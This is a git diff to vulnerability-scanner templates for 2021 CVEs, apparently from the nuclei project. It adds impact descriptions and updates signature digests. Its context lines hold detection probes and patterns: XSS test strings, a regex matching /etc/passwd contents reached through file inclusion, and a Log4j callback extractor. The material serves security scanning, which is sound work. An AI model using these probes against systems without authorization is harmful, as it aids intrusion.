-# digest: 490a0046304402201e88c31df6cbb4af09312c2202d5ee5a5f73cb05c3785c0340b46e94b1d408040220114827a6b5f30f7d8abedcd3ad54b63b696ddb4b2624519bfca48a4b34de040a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207707a682325b5c88afc95fc61fcf530bfbf04cb883ff1fb54b84b037be4a9d4902200c57f97f34c4157a2f38d522b20c7466316cb3384e5bb9b34b1bff253cb15197:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml
index c842f601ec..d56435f7ff 100644
--- a/http/cves/2021/CVE-2021-44528.yaml
+++ b/http/cves/2021/CVE-2021-44528.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.
+  impact: |
+    This vulnerability can lead to phishing attacks, where users are tricked into visiting malicious websites and disclosing sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the Open Redirect vulnerability in the Host Authorization Middleware.
   reference:
@@ -46,4 +48,4 @@ http:
           - 302
           - 307
           - 308
-# digest: 490a004630440220463ad4021cfb655236043c1c6b12357adb31a0ab23b7bf88fa46233255c1bf47022025856fa393f85a71f87140d17a295488e569fd36ed1f0a3aac7fea254a214bf7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022050301eb0475c17551378c806bb7b34df92f3c3c838654904a327d6474b42d40602210082435384e285bcba5d8ffd994925a7df51742156050d3f9731f9f552eed977db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml
index c38873ed0d..13f65a8825 100644
--- a/http/cves/2021/CVE-2021-44529.yaml
+++ b/http/cves/2021/CVE-2021-44529.yaml
@@ -5,6 +5,8 @@ info:
   author: duty_1g,phyr3wall,Tirtha
   severity: critical
   description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
   remediation: |
     Apply the latest security patches provided by Ivanti to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c4ca6877fd92fb1e46942f5f9a8a93d2a044710ea2c7e966abf9cb87f40cacd00221008d04c11b8582aa1c0d1fac4b634b601f910d4533c311fa8ea6bf435af011522e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ff75ce6744a94ea7d57e5c4c0eacbaba2a37b7b89b3602123f6e1edfc1685805022066f64ded5e00ade690d77b46fc0a1ee9660639b6d3c1dd82c7b937a0f775b9e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml
index 60882d0f0a..32c8df3d64 100644
--- a/http/cves/2021/CVE-2021-44848.yaml
+++ b/http/cves/2021/CVE-2021-44848.yaml
@@ -5,6 +5,8 @@ info:
   author: danielmofer
   severity: medium
   description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)
+  impact: |
+    An attacker can use the gathered usernames for further attacks, such as brute-forcing passwords or launching targeted phishing campaigns.
   remediation: |
     Apply the vendor-supplied patch or upgrade to the latest version of Thinfinity VirtualUI to mitigate the user enumeration vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204505439d1751a38cdc2f24a6aabf999126b9c80d24be5a00e977987170617cbd022100a58c6bb07bda01d4204b51c80d3451e8fbf98aa7f2951315e281f567c8fc83a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e2b18b5de5a038ce0003530e1a1071549641dc5c816ecbca297f61d648254a9f0221008cbec407180cafdf40820b65e9f76ab8bd88092e68fe28c563a5e30a08962c49:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml
index e8518bfb55..ab1ee0cadc 100644
--- a/http/cves/2021/CVE-2021-45043.yaml
+++ b/http/cves/2021/CVE-2021-45043.yaml
@@ -5,6 +5,8 @@ info:
   author: Momen Eldawakhly,Evan Rubinstein
   severity: high
   description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in HD-Network Realtime Monitoring System 2.0.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022063ab4931cf02b19036dee84692d39062aa7d32a57b20d460bbc5315a2986dcf3022100b1ad91e0e025e20a35be9eedd99afbccef214d892c3b514f16acb83b3161573e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b8610b2243a4a30d45082ff01cd88734820fa34e2b56afe46a691a250b3b1c07022100b32515353f8a2032c60f644a1da71678e16c4e9ca3d56765e516fb502e9df5a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml
index b10cec6021..537402d0ec 100644
--- a/http/cves/2021/CVE-2021-45046.yaml
+++ b/http/cves/2021/CVE-2021-45046.yaml
@@ -4,6 +4,8 @@ info:
   author: ImNightmaree
   severity: critical
   description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache Log4j2.
   reference:
@@ -71,4 +73,4 @@ http:
           - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
         part: interactsh_request
         # digest: 4a0a0047304502204a840a21336953401491afca41b378a09a1f91d1a9ddcc3730006d76b55739e1022100daab695f729353f232cefc195d1664d48a955e22a6c539731cf0eecf2718fdb9:922c64590222798bb761d5b6d8e72950
-# digest: 4a0a0047304502203459046c133e29c753469c43ccec87627f23b17f4986eab0416db7ec8fcc743e0221008c335adfdf5d51f5dbc7332c167c9a17fe29edc08e2d29644af112b3a6ce32df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202396e2a6601a1ce496ac07fff11fc198b3a9664c9e5bff869051ab5eb707540e022100d5b884bf533f7d3d07648714af6a62522164ea2f3db6ee13b85389e210a06a4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml
index 38a9d0584a..9b9512b48e 100644
--- a/http/cves/2021/CVE-2021-45092.yaml
+++ b/http/cves/2021/CVE-2021-45092.yaml
@@ -5,6 +5,8 @@ info:
   author: danielmofer
   severity: critical
   description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default  could allow IFRAME injection via the "vpath" parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential remote code execution.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
   reference:
@@ -37,4 +39,4 @@ http:
           - ".*vpath.*"
           - "thinfinity"
         condition: and
-# digest: 4a0a0047304502202d4c505d2801b0222223e8bdb1b22a1b5d1494dccf56a09826e389bdbeb6d41c022100a2dbdaa8a1b903ee3f9816e7f5a80edf59754de88bec96ea98825029e321d2be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022004fbd635d576f4fc9ff832848056bec9659a806d0d8620c5b0788947dade9144022057f78d2e4f68540323242ff7a1df6a0adfeb1556f0353e265194418c20f4db82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml
index 1b9e9ca36e..74f3aa4f23 100644
--- a/http/cves/2021/CVE-2021-45232.yaml
+++ b/http/cves/2021/CVE-2021-45232.yaml
@@ -5,6 +5,8 @@ info:
   author: Mr-xn
   severity: critical
   description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`,  some API directly use the interface of framework `gin` thus bypassing their authentication.
+  impact: |
+    An attacker can gain unauthorized access to the API, potentially leading to data breaches or unauthorized actions.
   remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
   reference:
     - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220189ecda00d6072cdbb8d1c869ffc430c44c6b00662a31933d530db9482ae5dda02205d4acee41c7ab90f00ecccfd3786f94a97c9d30857e7bff388fe50bab5d7df73:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203c75f44cb609b2b23b41433bd384fdd52a0bc34c48f307a748c3b59a24b0e89c022100e5f2bd0a2f2da558224a2b7396d8446eda27e615c92efbeab9198bfbcad9da7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml
index d46f118661..8f8b469078 100644
--- a/http/cves/2021/CVE-2021-45380.yaml
+++ b/http/cves/2021/CVE-2021-45380.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d952dd9dcdf4bb8a326a393447e4f8b9e4bd9f6324073f4af82ab9a48ef5b3df022100afec94595a4fa0a3a51a64e837824f7b18f859ecde87fad24abaec37ab22bd58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e369123560b6880d4555f004012fc9eb16edee931f0c3ccb14108ec4874a81a8022100d61d4e2184474e46ad95b6d54e73545a3ba0f4b0e3015e5769b66421ff405545:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml
index d8f7a11e0d..56df76c3c0 100644
--- a/http/cves/2021/CVE-2021-45422.yaml
+++ b/http/cves/2021/CVE-2021-45422.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Reprise License Manager 14.2.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206cc1eed1ed2f3049698f0724c6bc63e146da503f45fb75b1b7f42774c9ee098002207a3bb83a752084943da604d643466b1efefb20fea3d216f1e93fb9c75154b17f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f2bdbb71a59150787425953944557834c8a9c9647bad65383d90b23eb970d80c02203618e84157c400017ddd93ccc0967b357c9c5eff3f62a001d6a22562a24a7d0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml
index 5a5b616784..7047ec383f 100644
--- a/http/cves/2021/CVE-2021-45428.yaml
+++ b/http/cves/2021/CVE-2021-45428.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized accessand data leakage.
   remediation: |
     Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
           - 'status_code_1 == 404 && status_code_2 == 201'
           - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
         condition: and
-# digest: 490a0046304402200f11150bf878c59c8200ab492d2e4a60de326fbf08788dd4c46686d0a557c4e20220491481daab09d2c97cadb34c34ff1328567d0716b8a56fb7916c6ef93a90c545:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a071999adf70f525e8efc475b05fe4005043e969ca8f3e7d05eeca90a35d972e022100e7a4c84bebc9a67a21d7d3bbe961c7f7570f357787436067633530aeb74a4216:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml
index 3e1aaae8f7..04d5523c6b 100644
--- a/http/cves/2021/CVE-2021-45967.yaml
+++ b/http/cves/2021/CVE-2021-45967.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.
+  impact: |
+    The vulnerability can result in unauthorized access to sensitive data or systems, potentially leading to further exploitation or compromise.
   remediation: |
     Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967).
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220133a1fef6a1a5646680a5fab48c24df9e4005268109df8c04a85397d911fea09022005d1b5dc2c1060c680b75c9b53ce5226415793e7a835e714d210686fbf70b27f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210087388ea8751fc572d52756ed8ae075dd52c0ff6bd5584cf1f6c13db7779ebe41022100905b6cf89cb795ad34775d86390a46c15b4874202526e031175b9d69784b8273:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml
index d07cbea9f2..08b5567458 100644
--- a/http/cves/2021/CVE-2021-45968.yaml
+++ b/http/cves/2021/CVE-2021-45968.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.
+  impact: |
+    The vulnerability can be exploited by an attacker to gain unauthorized access to sensitive information, execute arbitrary code, or perform other malicious activities.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS.
   reference:
@@ -43,4 +45,4 @@ http:
         dsl:
           - "status_code_2 != status_code_1"
         condition: and
-# digest: 490a0046304402205c3d5f45720216456bee868ad6d077e7184cf777031d8adef191b91935f86556022018dd04a4863b1ec599d06c02fee6577f1cb462e10d6722af23ab9b187e1a6211:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009c2be61ff578f199e450c7e533684c3bf79d93f1b273db3536bc630253424da4022100a2ab7f5bdbb9b5dc8f79729b96b988839be813fa5bc268ed521b3d6a14338fee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml
index c23b63fc43..785b44ce20 100644
--- a/http/cves/2021/CVE-2021-46005.yaml
+++ b/http/cves/2021/CVE-2021-46005.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: medium
   description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -116,4 +118,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bb79cc95b92c565f4874b7d0b94569e15d3cc16a121fde010907eeb1c09d935e022100cec193140e226a97c833f97af60784e6bc6898d0a6a898a607d58be0c4dbe666:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008bb2e08d3ec774962c0fb64394b687817565a09ace2b41c71e4dcbae46ed1b99022100d1e101d03967c5a248e084b9edf5371ff14a1d8ea93c993256dfc3f6ca5080c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml
index c4a7a80c74..621884fc2f 100644
--- a/http/cves/2021/CVE-2021-46068.yaml
+++ b/http/cves/2021/CVE-2021-46068.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - "status_code_3 == 200"
           - 'contains(body_3, "Administrator\"><script>alert(document.domain)</script> Admin")'
         condition: and
-# digest: 4a0a0047304502205c6e8d32a81ef61eae5d45db7815103f506e00e4bc3e08fa7c0c33f9f0522b19022100bd1219b128505287f74fcebe96f98d05f9308953712b696fdcfbdd8583d97ac4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eb51b8eafc8088c2c35a3761dad2280ad01c49a9945f36eb4acdbc6867928fed02200885c959aff16e33c3a4794dd18cb31b6eff28d2cb297553ed1e826b3f2e2a76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml
index 1716741477..db1c5bb8ab 100644
--- a/http/cves/2021/CVE-2021-46069.yaml
+++ b/http/cves/2021/CVE-2021-46069.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - "status_code_3 == 200"
           - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
         condition: and
-# digest: 4a0a0047304502203d5b2effa1c3906ff0391d4119c3f7826cb38824f9978f28bf455d4b214fba24022100d3dbfc06a8d4d1372c98cd01ea0bf2d0527c295f48ace7e345a720354ee13404:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008d7f9fc574daa652f225b0d5b9e748e26b0a7bbc7a44b16645d5933f94aa65a802200fda6f390c99ed5896ebaffb13cc7af3bf450eb0b9e5500a166d9cb8c9f5c3c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml
index 24dd18cb96..cde09f75c2 100644
--- a/http/cves/2021/CVE-2021-46071.yaml
+++ b/http/cves/2021/CVE-2021-46071.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -57,4 +59,4 @@ http:
           - "status_code_3 == 200"
           - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
         condition: and
-# digest: 4a0a004730450220458dd3c3bd166454cf3835f694844e402c39e71c73c2612a7275d4e11eefe6190221008b6902be0cbca99ea45ec1e0c495f3fe9bf2700306f98a1d7b9784a5b88fe4d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203975b3cb1681060511778e5a322671f9e7ff1abcbc4d36320ac1564125d3d6e7022100999318810f2f50779eeefb4e3e63164d938fc062e5e4775e0247221e37f1ec14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml
index 9fc5430c1e..e38ccfa7eb 100644
--- a/http/cves/2021/CVE-2021-46072.yaml
+++ b/http/cves/2021/CVE-2021-46072.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - "status_code_3 == 200"
           - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
         condition: and
-# digest: 4a0a00473045022100af2f9ac8efe06a6c0fe834d061f8a874b610b78e88b628c72f91ecfea1e08cb80220065ae0d3ed0b954babd53a0a1df87b03547fcaf782342b71434fff35cde92f0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008e4f6137f5a04f3dcf0e837aa546ee8dad85fde817c0a80336742c36c617bd8c02200554bfbda61343fb641d690e4535c59093325d351fa73587842f33361e519610:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml
index 053c168123..0555f15927 100644
--- a/http/cves/2021/CVE-2021-46073.yaml
+++ b/http/cves/2021/CVE-2021-46073.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - "status_code_3 == 200"
           - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
         condition: and
-# digest: 490a0046304402200b9be10f063d26b7f69e93ab2fb3f5925c9abb9464ce2cc7dd1dbf52725a858202203785f9f0ae10ee5d523c3978f22706bce7a395fd05cd3f0bed317c8be0043585:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009972fca98d90a2f75a4edef47175bb24c9d650779e01c2eeb824b0f86d0deeb3022100ee838fd0986c49370b428bcbd034778f6370b51a844b29b1598f1df9b94d3c89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml
index 162f217cd5..b72dcbed17 100644
--- a/http/cves/2021/CVE-2021-46107.yaml
+++ b/http/cves/2021/CVE-2021-46107.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
+  impact: |
+    The impact of this vulnerability is significant as it can result in unauthorized access to sensitive data or systems.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         dsl:
           - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
           - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"
-# digest: 4a0a00473045022100e4004f7f1aa0f77a89ba7ccc22be74a430511b62ae29f1a2679e65befff7fbf2022003a3d5fa0860db1385bf37babfb4f9f0cc4873efdebd9c719e273c9a529466b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f22d0f598167c35c360f68ded80ce77e2590f5d17ee4cae8317f6d6edc117189022100901bf775ba5c948c1ff766d9a9ad205a64b90fe8a566ea1219d92053b75995e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml
index eae512c2ad..8cd466491a 100644
--- a/http/cves/2021/CVE-2021-46379.yaml
+++ b/http/cves/2021/CVE-2021-46379.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the open redirect vulnerability.
   reference:
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a0046304402204c52048dd9f8b2a4297b40c085c88e57f92b1588954d28d9a99a10e48dd4b3fe02203047123ab66b3a833661e8ecc77243659e97bd37a9d8f9f9057332e26bc824a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210089ac042e8d7c3f510542dbe1678bf4ac10cce76b019f7023ca12bae642d7f3d00221008a67500594cb518fe22cfc8ace00acf9a338106a44bd672dcf5e93ea1868fbcd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml
index 5eaa6c6728..b8ea4ff65f 100644
--- a/http/cves/2021/CVE-2021-46381.yaml
+++ b/http/cves/2021/CVE-2021-46381.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can  lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network.
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability.
   reference:
@@ -37,4 +39,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a0047304502202accf4f0c481944ec263a4e64b4ab188f0767a4a44834f696914a8c319b93a33022100fd90878e248fb911ce5790c3c0db76fe9f54e137487e33d46aa4f028a41b9bdd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220369764e13599883315dac0eeb6e2d80e0d0c20f3bc4c221c905dc407aa15fd36022011446ef4270d74ed4a3241fd926e428ee4183df2ccb8349c977139d855b29037:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml
index f56b4ddb64..de652fe759 100644
--- a/http/cves/2021/CVE-2021-46387.yaml
+++ b/http/cves/2021/CVE-2021-46387.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDk
   severity: medium
   description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201dcc3ac772f977eb4ec7d1683a386d74122b154304f4fea38993fcf27eba290a022100c66dc25a916fee744e73e424b5394fc82645967083fb0668cc2fa51887b56687:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220011464d3e0f29523d21414d9be3676e0be0e4943b18f39a9fe20a68543c7cb54022100ea7cd311458159f80f6eec926618e90ce36b83f45565b6f05328ff8e6e58c135:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml
index e45072e86c..911ef91c61 100644
--- a/http/cves/2021/CVE-2021-46417.yaml
+++ b/http/cves/2021/CVE-2021-46417.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
   remediation: |
